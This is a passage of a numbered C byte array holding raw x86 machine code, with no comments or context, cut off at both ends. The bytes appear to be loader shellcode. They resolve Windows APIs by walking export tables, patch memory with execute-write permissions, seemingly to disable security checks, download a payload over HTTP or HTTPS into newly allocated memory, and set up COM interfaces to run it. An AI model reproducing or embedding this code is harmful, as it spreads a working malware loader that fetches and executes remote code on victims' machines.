98 0x04, 0x00, 0x8b, 0x44, 0x24, 0x18, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2,
99 0x18, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x0f, 0xaf, 0x44, 0x24, 0x08, 0xc3,
100 0x8b, 0x44, 0x24, 0x14, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, 0x14, 0x00,
101 0x8b, 0x44, 0x24, 0x04, 0x03, 0x44, 0x24, 0x08, 0xc3, 0x51, 0x53, 0x56,
102 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x38, 0x03, 0x00, 0x00, 0x50, 0xff,
103 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, 0xc5, 0x00,
104 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0xac, 0x03, 0x00, 0x00, 0x50, 0x53,
105 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, 0x00, 0x00,
106 0x00, 0xbf, 0x8e, 0x14, 0x40, 0x00, 0x81, 0xef, 0x82, 0x14, 0x40, 0x00,
107 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a,
108 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00,
109 0x00, 0x00, 0x57, 0xe8, 0xd8, 0x15, 0x00, 0x00, 0xb9, 0x82, 0x14, 0x40,
110 0x00, 0x81, 0xe9, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc1, 0x50, 0x55, 0xe8,
111 0x61, 0x18, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
112 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, 0x86, 0xbc,
113 0x03, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed,
114 0x74, 0x49, 0xbf, 0xa4, 0x14, 0x40, 0x00, 0xbb, 0x98, 0x14, 0x40, 0x00,
115 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57,
116 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0x7e, 0x15,
117 0x00, 0x00, 0x81, 0xeb, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55,
118 0xe8, 0x0c, 0x18, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10,
119 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0,
120 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x51,
121 0x53, 0x56, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x4c, 0x03, 0x00, 0x00,
122 0x50, 0xff, 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9,
123 0xc5, 0x00, 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0x5c, 0x03, 0x00, 0x00,
124 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa,
125 0x00, 0x00, 0x00, 0xbf, 0xda, 0x2a, 0x40, 0x00, 0x81, 0xef, 0x0e, 0x14,
126 0x40, 0x00, 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18,
127 0x50, 0x6a, 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84,
128 0x85, 0x00, 0x00, 0x00, 0x57, 0xe8, 0xf2, 0x14, 0x00, 0x00, 0xb9, 0x0e,
129 0x14, 0x40, 0x00, 0x81, 0xe9, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc1, 0x50,
130 0x55, 0xe8, 0x7b, 0x17, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24,
131 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d,
132 0x86, 0x7c, 0x03, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8,
133 0x85, 0xed, 0x74, 0x49, 0xbf, 0xd1, 0x2a, 0x40, 0x00, 0xbb, 0xc2, 0x2a,
134 0x40, 0x00, 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a,
135 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8,
136 0x98, 0x14, 0x00, 0x00, 0x81, 0xeb, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc3,
137 0x50, 0x55, 0xe8, 0x26, 0x17, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44,
138 0x24, 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48,
139 0x33, 0xc0, 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59,
140 0xc3, 0x81, 0xec, 0x58, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0x6a, 0x3c,
141 0x5f, 0x33, 0xf6, 0x8d, 0x44, 0x24, 0x28, 0x57, 0x56, 0x50, 0x89, 0x74,
142 0x24, 0x20, 0xbb, 0x00, 0x02, 0x60, 0x84, 0xe8, 0x09, 0x17, 0x00, 0x00,
143 0x8d, 0x44, 0x24, 0x70, 0x89, 0x7c, 0x24, 0x34, 0x8b, 0xbc, 0x24, 0x74,
144 0x02, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x89, 0x44, 0x24, 0x38, 0x8d, 0x84,
145 0x24, 0x64, 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x54, 0xb8, 0x00, 0x01,
146 0x00, 0x00, 0x89, 0x44, 0x24, 0x3c, 0x89, 0x44, 0x24, 0x58, 0x8d, 0x44,
147 0x24, 0x28, 0x50, 0x68, 0x00, 0x00, 0x00, 0x10, 0x56, 0x8d, 0x87, 0x10,
148 0x05, 0x00, 0x00, 0x50, 0xff, 0x57, 0x7c, 0x85, 0xc0, 0x0f, 0x84, 0xb4,
149 0x01, 0x00, 0x00, 0x33, 0xc0, 0x83, 0x7c, 0x24, 0x34, 0x04, 0x56, 0x56,
150 0x0f, 0x94, 0xc0, 0x56, 0x89, 0x44, 0x24, 0x1c, 0xb8, 0x00, 0x32, 0xe0,
151 0x84, 0x56, 0x56, 0x0f, 0x44, 0xd8, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00,
152 0x8b, 0xc8, 0x89, 0x4c, 0x24, 0x24, 0x85, 0xc9, 0x0f, 0x84, 0x85, 0x01,
153 0x00, 0x00, 0x39, 0x74, 0x24, 0x10, 0xba, 0xbb, 0x01, 0x00, 0x00, 0x56,
154 0x56, 0x6a, 0x03, 0x56, 0x56, 0x6a, 0x50, 0x58, 0x0f, 0x45, 0xc2, 0x0f,
155 0xb7, 0xc0, 0x50, 0x8d, 0x44, 0x24, 0x7c, 0x50, 0x51, 0xff, 0x97, 0x84,
156 0x00, 0x00, 0x00, 0x8b, 0xc8, 0x89, 0x4c, 0x24, 0x20, 0x85, 0xc9, 0x0f,
157 0x84, 0xfb, 0x00, 0x00, 0x00, 0x55, 0x56, 0x53, 0x56, 0x56, 0x56, 0x8d,
158 0x84, 0x24, 0x7c, 0x01, 0x00, 0x00, 0x50, 0x8d, 0x87, 0x10, 0x06, 0x00,
159 0x00, 0x50, 0x51, 0xff, 0x97, 0x94, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x85,
160 0xed, 0x0f, 0x84, 0xca, 0x00, 0x00, 0x00, 0x39, 0x74, 0x24, 0x14, 0x74,
161 0x20, 0xf7, 0xc3, 0x00, 0x10, 0x00, 0x00, 0x74, 0x18, 0x6a, 0x04, 0x8d,
162 0x44, 0x24, 0x20, 0xc7, 0x44, 0x24, 0x20, 0x80, 0x33, 0x00, 0x00, 0x50,
163 0x6a, 0x1f, 0x55, 0xff, 0x97, 0x88, 0x00, 0x00, 0x00, 0x56, 0x56, 0x56,
164 0x56, 0x55, 0xff, 0x97, 0x98, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84,
165 0x8a, 0x00, 0x00, 0x00, 0x56, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24,
166 0x14, 0x04, 0x00, 0x00, 0x00, 0x50, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x68,
167 0x13, 0x00, 0x00, 0x20, 0x55, 0xff, 0x97, 0x9c, 0x00, 0x00, 0x00, 0x85,
168 0xc0, 0x74, 0x67, 0x81, 0x7c, 0x24, 0x18, 0xc8, 0x00, 0x00, 0x00, 0x75,
169 0x5d, 0x56, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00,
170 0x00, 0x00, 0x50, 0x8d, 0x9f, 0x40, 0x07, 0x00, 0x00, 0x53, 0x68, 0x05,
171 0x00, 0x00, 0x20, 0x55, 0x89, 0x33, 0x89, 0x73, 0x04, 0xff, 0x97, 0x9c,
172 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x33, 0x8b, 0x03, 0x0b, 0x43, 0x04,
173 0x74, 0x2c, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x33, 0x56,
174 0xff, 0x57, 0x3c, 0x89, 0x87, 0x48, 0x07, 0x00, 0x00, 0x85, 0xc0, 0x74,
175 0x15, 0x8d, 0x4c, 0x24, 0x20, 0x89, 0x74, 0x24, 0x20, 0x51, 0xff, 0x33,
176 0x50, 0x55, 0xff, 0x97, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0xf0, 0x55, 0xff,
177 0x97, 0x90, 0x00, 0x00, 0x00, 0xff, 0x74, 0x24, 0x24, 0xff, 0x97, 0x90,
178 0x00, 0x00, 0x00, 0x5d, 0xff, 0x74, 0x24, 0x24, 0xff, 0x97, 0x90, 0x00,
179 0x00, 0x00, 0x85, 0xf6, 0x74, 0x45, 0xff, 0xb7, 0x40, 0x07, 0x00, 0x00,
180 0x8b, 0x9f, 0x48, 0x07, 0x00, 0x00, 0x8d, 0x87, 0x30, 0x07, 0x00, 0x00,
181 0x53, 0x50, 0x8d, 0x87, 0x20, 0x07, 0x00, 0x00, 0x50, 0xe8, 0x0e, 0x14,
182 0x00, 0x00, 0xff, 0x77, 0x2c, 0x8d, 0x87, 0x18, 0x06, 0x00, 0x00, 0xff,
183 0x77, 0x28, 0x50, 0xe8, 0xd7, 0x12, 0x00, 0x00, 0x83, 0xc4, 0x1c, 0x3b,
184 0x83, 0x08, 0x19, 0x00, 0x00, 0x75, 0x0c, 0x3b, 0x93, 0x0c, 0x19, 0x00,
185 0x00, 0x75, 0x04, 0x8b, 0xc6, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5e, 0x5b,
186 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0xc3, 0x81, 0xec, 0xdc, 0x01, 0x00,
187 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0xf0, 0x01, 0x00, 0x00, 0x57,
188 0x8b, 0x6e, 0x3c, 0x8b, 0x44, 0x2e, 0x78, 0x85, 0xc0, 0x0f, 0x84, 0xe5,
189 0x00, 0x00, 0x00, 0x8d, 0x3c, 0x30, 0x8b, 0x5f, 0x18, 0x85, 0xdb, 0x0f,
190 0x84, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x47, 0x1c, 0x33, 0xd2, 0x03, 0xc6,
191 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x24, 0x8b, 0x47, 0x20, 0x03,
192 0xc6, 0x89, 0x44, 0x24, 0x14, 0x8b, 0x47, 0x24, 0x03, 0xc6, 0x89, 0x44,
193 0x24, 0x20, 0x8b, 0x47, 0x0c, 0x03, 0xc6, 0x8a, 0x08, 0x84, 0xc9, 0x74,
194 0x2a, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x94, 0x24, 0xe8, 0x00, 0x00, 0x00,
195 0x2b, 0xd0, 0x80, 0xc9, 0x20, 0x46, 0x88, 0x0c, 0x02, 0x40, 0x8a, 0x08,
196 0x84, 0xc9, 0x75, 0xf2, 0x89, 0x74, 0x24, 0x10, 0x8b, 0xb4, 0x24, 0xf4,
197 0x01, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x10, 0xff, 0xb4, 0x24, 0x04, 0x02,
198 0x00, 0x00, 0x8d, 0x84, 0x24, 0xec, 0x00, 0x00, 0x00, 0xc6, 0x84, 0x14,
199 0xec, 0x00, 0x00, 0x00, 0x00, 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00,
200 0x50, 0xe8, 0x0d, 0x12, 0x00, 0x00, 0x89, 0x44, 0x24, 0x24, 0x83, 0xc4,
201 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc0, 0xfc, 0x89, 0x54, 0x24, 0x1c,
202 0x8d, 0x04, 0x98, 0x89, 0x44, 0x24, 0x10, 0xff, 0xb4, 0x24, 0x04, 0x02,
203 0x00, 0x00, 0x8b, 0x08, 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x03,
204 0xce, 0x51, 0xe8, 0xdc, 0x11, 0x00, 0x00, 0x33, 0x44, 0x24, 0x24, 0x83,
205 0xc4, 0x0c, 0x33, 0x54, 0x24, 0x1c, 0x3b, 0x84, 0x24, 0xf8, 0x01, 0x00,
206 0x00, 0x75, 0x09, 0x3b, 0x94, 0x24, 0xfc, 0x01, 0x00, 0x00, 0x74, 0x1d,
207 0x8b, 0x44, 0x24, 0x10, 0x83, 0xe8, 0x04, 0x89, 0x44, 0x24, 0x10, 0x83,
208 0xeb, 0x01, 0x75, 0xbb, 0x33, 0xc0, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4,
209 0xdc, 0x01, 0x00, 0x00, 0xc3, 0x8b, 0x44, 0x24, 0x20, 0x8b, 0x4c, 0x24,
210 0x24, 0x0f, 0xb7, 0x44, 0x58, 0xfe, 0x8b, 0x0c, 0x81, 0x03, 0xce, 0x3b,
211 0xcf, 0x72, 0x7d, 0x8b, 0x44, 0x2e, 0x7c, 0x03, 0xc7, 0x3b, 0xc8, 0x73,
212 0x73, 0x33, 0xd2, 0x38, 0x11, 0x74, 0x1e, 0x8d, 0x7c, 0x24, 0x28, 0x8b,
213 0xf1, 0x2b, 0xf9, 0x83, 0xfa, 0x3c, 0x73, 0x11, 0x8a, 0x06, 0x88, 0x04,
214 0x37, 0x80, 0x3e, 0x2e, 0x74, 0x07, 0x42, 0x46, 0x80, 0x3e, 0x00, 0x75,
215 0xea, 0xc7, 0x44, 0x14, 0x29, 0x64, 0x6c, 0x6c, 0x00, 0x42, 0x03, 0xca,
216 0x33, 0xd2, 0x38, 0x11, 0x74, 0x17, 0x8d, 0x74, 0x24, 0x68, 0x2b, 0xf1,
217 0x83, 0xfa, 0x7f, 0x73, 0x0c, 0x8a, 0x01, 0x42, 0x88, 0x04, 0x0e, 0x41,
218 0x80, 0x39, 0x00, 0x75, 0xef, 0x8b, 0xb4, 0x24, 0xf0, 0x01, 0x00, 0x00,
219 0x8d, 0x44, 0x24, 0x28, 0x50, 0xc6, 0x44, 0x14, 0x6c, 0x00, 0xff, 0x56,
220 0x30, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x4c, 0x24, 0x68, 0x51, 0x50, 0xff,
221 0x56, 0x34, 0x8b, 0xc8, 0xeb, 0x02, 0x33, 0xc9, 0x8b, 0xc1, 0xe9, 0x5b,
222 0xff, 0xff, 0xff, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x33, 0xff, 0x8b,
223 0x4e, 0x18, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
224 0x89, 0x7e, 0x18, 0x8b, 0x4e, 0x1c, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01,
225 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x1c, 0x8b, 0x4e, 0x14, 0x85, 0xc9,
226 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x14, 0x8b,
227 0x4e, 0x10, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
228 0x89, 0x7e, 0x10, 0x8b, 0x4e, 0x0c, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01,
229 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x0c, 0x8b, 0x4e, 0x08, 0x85, 0xc9,
230 0x74, 0x12, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x2c, 0x8b, 0x46, 0x08, 0x50,
231 0x8b, 0x08, 0xff, 0x51, 0x08, 0x89, 0x7e, 0x08, 0x8b, 0x4e, 0x04, 0x85,
232 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x04,
233 0x8b, 0x0e, 0x85, 0xc9, 0x74, 0x08, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
234 0x89, 0x3e, 0x5f, 0x5e, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x83, 0xc0, 0x10,
235 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04, 0x00, 0xb8, 0x01, 0x40, 0x00,
236 0x80, 0xc2, 0x0c, 0x00, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x10, 0x00,
237 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x08, 0x00, 0x8b, 0x44, 0x24, 0x04,
238 0xff, 0x74, 0x24, 0x18, 0xff, 0x74, 0x24, 0x14, 0x8b, 0x40, 0x08, 0xff,
239 0x74, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0xc2, 0x18, 0x00,
240 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x14, 0x00, 0x57, 0x8b, 0x7c, 0x24,
241 0x14, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x16,
242 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff,
243 0x51, 0x04, 0x8b, 0x46, 0x08, 0x89, 0x07, 0x33, 0xc0, 0x5e, 0x5f, 0xc2,
244 0x10, 0x00, 0x8b, 0x44, 0x24, 0x08, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x03,
245 0x40, 0x00, 0x80, 0xeb, 0x08, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33,
246 0xc0, 0xc2, 0x08, 0x00, 0x55, 0x8b, 0xec, 0xff, 0x75, 0x28, 0x8b, 0x45,
247 0x08, 0xff, 0x75, 0x24, 0xff, 0x75, 0x20, 0x8b, 0x48, 0x08, 0xff, 0x75,
248 0x1c, 0xff, 0x75, 0x18, 0x8b, 0x11, 0xff, 0x75, 0x0c, 0x50, 0x51, 0xff,
249 0x52, 0x2c, 0x5d, 0xc2, 0x24, 0x00, 0x53, 0x56, 0x57, 0xe8, 0x42, 0x0f,
250 0x00, 0x00, 0x8b, 0x74, 0x24, 0x14, 0xb9, 0x13, 0x1e, 0x40, 0x00, 0xbf,
251 0xe4, 0x2a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08,
252 0xe8, 0x27, 0x0f, 0x00, 0x00, 0xb9, 0xe5, 0x1a, 0x40, 0x00, 0x2b, 0xcf,
253 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0x14, 0x0f, 0x00, 0x00,
254 0xb9, 0x9c, 0x1e, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
255 0x48, 0x08, 0xe8, 0x01, 0x0f, 0x00, 0x00, 0xb9, 0x5a, 0x1b, 0x40, 0x00,
256 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0xee, 0x0e,
257 0x00, 0x00, 0xb9, 0x30, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
258 0x06, 0x89, 0x48, 0x10, 0xe8, 0xdb, 0x0e, 0x00, 0x00, 0xb9, 0x0c, 0x1b,
259 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x14, 0xe8,
260 0xc8, 0x0e, 0x00, 0x00, 0xb9, 0x74, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03,
261 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x18, 0xe8, 0xb5, 0x0e, 0x00, 0x00, 0xb9,
262 0x71, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
263 0x1c, 0xe8, 0xa2, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b,
264 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x20, 0xe8, 0x8f, 0x0e, 0x00,
265 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
266 0x89, 0x48, 0x24, 0xe8, 0x7c, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40,
267 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x28, 0xe8, 0x69,
268 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
269 0x8b, 0x06, 0x89, 0x48, 0x2c, 0xe8, 0x56, 0x0e, 0x00, 0x00, 0xb9, 0x04,
270 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x30,
271 0xe8, 0x43, 0x0e, 0x00, 0x00, 0xb9, 0x84, 0x1e, 0x40, 0x00, 0x2b, 0xcf,
272 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x34, 0xe8, 0x30, 0x0e, 0x00, 0x00,
273 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
274 0x48, 0x38, 0xe8, 0x1d, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00,
275 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x3c, 0xe8, 0x0a, 0x0e,
276 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
277 0x06, 0x89, 0x48, 0x40, 0xe8, 0xf7, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b,
278 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x44, 0xe8,
279 0xe4, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03,
280 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x48, 0xe8, 0xd1, 0x0d, 0x00, 0x00, 0xb9,
281 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
282 0x4c, 0xe8, 0xbe, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b,
283 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x50, 0xe8, 0xab, 0x0d, 0x00,
284 0x00, 0xb9, 0xfc, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
285 0x89, 0x48, 0x54, 0xe8, 0x98, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40,
286 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x58, 0xe8, 0x85,
287 0x0d, 0x00, 0x00, 0xb9, 0x28, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
288 0x8b, 0x06, 0x89, 0x48, 0x5c, 0xe8, 0x72, 0x0d, 0x00, 0x00, 0xb9, 0x04,
289 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x60,
290 0xe8, 0x5f, 0x0d, 0x00, 0x00, 0xb9, 0xac, 0x1e, 0x40, 0x00, 0x2b, 0xcf,
291 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x64, 0xe8, 0x4c, 0x0d, 0x00, 0x00,
292 0xb9, 0xf4, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
293 0x48, 0x68, 0xe8, 0x39, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00,
294 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x6c, 0xe8, 0x26, 0x0d,
295 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
296 0x06, 0x89, 0x48, 0x70, 0xe8, 0x13, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b,
297 0x40, 0x00, 0x8d, 0x5e, 0x04, 0x2b, 0xcf, 0x8b, 0x7c, 0x24, 0x10, 0x03,
298 0xc8, 0x8b, 0x06, 0x53, 0x89, 0x48, 0x74, 0x8d, 0x87, 0xdc, 0x03, 0x00,
299 0x00, 0x83, 0x66, 0x10, 0x00, 0x50, 0x89, 0x7e, 0x14, 0xff, 0x57, 0x78,
300 0x85, 0xc0, 0x75, 0x13, 0x8b, 0x0b, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x87,
301 0x8c, 0x04, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x52, 0x18, 0x5f,
302 0x5e, 0x5b, 0xc3, 0x8b, 0x54, 0x24, 0x0c, 0x85, 0xd2, 0x75, 0x07, 0xb8,
303 0x03, 0x40, 0x00, 0x80, 0xeb, 0x5f, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33,
304 0xc9, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x14, 0x8b, 0x84,
305 0x8f, 0xfc, 0x03, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83,
306 0xf9, 0x04, 0x75, 0xee, 0xeb, 0x2a, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x0c,
307 0x04, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83, 0xf9, 0x04,
308 0x75, 0xee, 0xeb, 0x14, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x8c, 0x04, 0x00,
309 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x0c, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee,
310 0x89, 0x32, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x22, 0x00, 0xb8, 0x02, 0x40,
311 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x44, 0x24, 0x04,
312 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0xfd, 0x8b, 0x40, 0x0c, 0x50, 0x8b, 0x08,
313 0xff, 0x51, 0x38, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x8b, 0x4c, 0x24, 0x04,
314 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x10, 0x48, 0xc2, 0x04, 0x00,
315 0x8b, 0x44, 0x24, 0x04, 0xff, 0x74, 0x24, 0x08, 0x8b, 0x40, 0x14, 0xff,
316 0x50, 0x4c, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x83, 0xec, 0x14, 0x53, 0x8b,
317 0x5c, 0x24, 0x1c, 0x55, 0x56, 0x57, 0x33, 0xff, 0x8d, 0xab, 0x48, 0x07,
318 0x00, 0x00, 0x83, 0xbb, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8b, 0xc7, 0x89,
319 0x7c, 0x24, 0x10, 0x74, 0x03, 0x8b, 0x6d, 0x00, 0x8b, 0x8b, 0xa4, 0x00,
320 0x00, 0x00, 0x8b, 0x74, 0x24, 0x2c, 0x85, 0xc9, 0x0f, 0x84, 0xc5, 0x01,
321 0x00, 0x00, 0x56, 0x8d, 0x83, 0x2c, 0x04, 0x00, 0x00, 0x50, 0x8d, 0x83,
322 0x1c, 0x04, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88, 0x89,
323 0x01, 0x00, 0x00, 0x8b, 0x16, 0x8d, 0x7e, 0x04, 0x57, 0x8d, 0x83, 0x3c,
324 0x04, 0x00, 0x00, 0x50, 0x8b, 0x0a, 0x8d, 0x45, 0x04, 0x50, 0x52, 0xff,
